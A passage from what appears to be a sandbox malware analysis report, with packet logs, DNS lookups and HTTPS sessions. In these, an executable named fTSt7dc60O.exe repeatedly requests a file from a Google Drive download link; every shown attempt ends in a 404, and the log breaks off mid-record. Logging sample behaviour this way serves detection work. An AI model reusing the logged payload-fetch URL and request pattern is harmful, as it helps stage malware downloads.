                                                    Jan 10, 2025 15:40:34.065116882 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.065200090 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.066200018 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.066251993 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.067657948 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.067672968 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.067987919 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.068047047 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.068331003 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.111335039 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.449508905 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.450088978 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.450222015 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.450485945 CET52263443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:34.450529099 CET44352263172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:34.457120895 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:34.457211971 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:34.457300901 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:34.457539082 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:34.457566977 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.102473974 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.102709055 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.103235960 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.103250980 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.103430033 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.103435993 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.548507929 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.548593044 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.548630953 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.548669100 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.548691034 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.548716068 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.548732996 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.548779011 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.549451113 CET52264443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:35.549473047 CET44352264142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:35.674710989 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:35.674753904 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:35.674885988 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:35.675462008 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:35.675473928 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.315165997 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.315229893 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.316201925 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.316210985 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.316443920 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.316448927 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.700100899 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.700381994 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.700403929 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.700565100 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.700599909 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.700630903 CET44352265172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:36.700684071 CET52265443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:36.705792904 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:36.705843925 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:36.705925941 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:36.706182003 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:36.706193924 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.363647938 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.363800049 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.366480112 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.366497040 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.366796017 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.366802931 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.845448971 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.845550060 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.845567942 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.845606089 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.845628977 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.845654011 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.845654964 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.845705986 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.846465111 CET52266443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:37.846486092 CET44352266142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:37.971916914 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:37.971956015 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:37.972035885 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:37.972345114 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:37.972356081 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:38.659482956 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:38.659595966 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:38.660583973 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:38.660660028 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:38.662467003 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:38.662478924 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:38.662822008 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:38.662877083 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:38.663309097 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:38.703341961 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:39.058480978 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:39.058675051 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:39.058707952 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:39.058728933 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:39.058892012 CET52267443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:39.058913946 CET44352267172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:39.072674990 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:39.072705984 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:39.072788000 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:39.073086977 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:39.073101044 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:39.717488050 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:39.717694998 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:39.718142986 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:39.718158960 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:39.718322992 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:39.718333006 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.313625097 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.313724995 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.313747883 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:40.313774109 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.313790083 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:40.313831091 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:40.313838005 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.313857079 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.313884974 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:40.313910007 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:40.314477921 CET52268443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:40.314498901 CET44352268142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:40.441245079 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:40.441348076 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:40.441572905 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:40.441755056 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:40.441800117 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.193018913 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.193099022 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.193627119 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.193640947 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.193891048 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.193900108 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.577877045 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.577965021 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.578033924 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.578110933 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.578165054 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.578231096 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.578295946 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.603321075 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:41.603368998 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:41.603518963 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:41.603919029 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:41.603933096 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.232173920 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.232249022 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.232703924 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.232717991 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.232867956 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.232875109 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665096998 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665126085 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665172100 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665205002 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665220976 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665319920 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665360928 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665903091 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665925980 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.784024000 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:42.784085035 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:42.784195900 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:42.784528017 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:42.784549952 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.485913038 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.486732960 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.487201929 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.487277985 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.488581896 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.488610029 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.489681959 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.489773035 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.490047932 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.535329103 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.878143072 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.878232956 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.878484011 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.902498007 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.902569056 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.911336899 CET52272443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:43.911391020 CET44352272142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:43.911792040 CET52272443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:43.911792040 CET52272443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:43.911835909 CET44352272142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:44.562072039 CET44352272142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:44.562143087 CET52272443192.168.2.7142.250.186.161

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 10, 2025 15:39:02.633419991 CET53641051.1.1.1192.168.2.7
                                                    Jan 10, 2025 15:39:02.942725897 CET5389953192.168.2.71.1.1.1
                                                    Jan 10, 2025 15:39:02.949287891 CET53538991.1.1.1192.168.2.7
                                                    Jan 10, 2025 15:39:04.079005957 CET6195853192.168.2.71.1.1.1
                                                    Jan 10, 2025 15:39:04.086134911 CET53619581.1.1.1192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 10, 2025 15:39:02.942725897 CET192.168.2.71.1.1.10xeda5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                    Jan 10, 2025 15:39:04.079005957 CET192.168.2.71.1.1.10xaf26Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 10, 2025 15:39:02.949287891 CET1.1.1.1192.168.2.70xeda5No error (0)drive.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                    Jan 10, 2025 15:39:04.086134911 CET1.1.1.1192.168.2.70xaf26No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • drive.google.com
                                                    • drive.usercontent.google.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.751990172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:03 UTC216OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    2025-01-10 14:39:04 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:03 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-lzONwOcMYEinkNQ6M9Rpow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.751996142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:04 UTC258OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    2025-01-10 14:39:05 UTC2218INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTwPpK8b1IEFeWcBtM_0eBX8hjW67ysALGjNpiEgOaf4Sd-FQUXvMMuSLuL1qtMlqbl
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:05 GMT
                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-GV42_E1Q4HqwbFpjWxZNyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Set-Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU; expires=Sat, 12-Jul-2025 14:39:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 62 66 44 48 4e 78 31 41 45 49 30 69 7a 61 72 50 69 38 2d 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kbfDHNx1AEI0izarPi8-rA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.752007172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:06 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:06 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:06 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-slEN3OyqCp1vPRzcvEXeyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.752013142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:07 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:07 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQdeXmSp-9MKnLMvfT1s59gCYGFB0f3Fwqm-wjLqfzQLbnvgzorc74mQ0yQ45f78GkykQPKaaI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:07 GMT
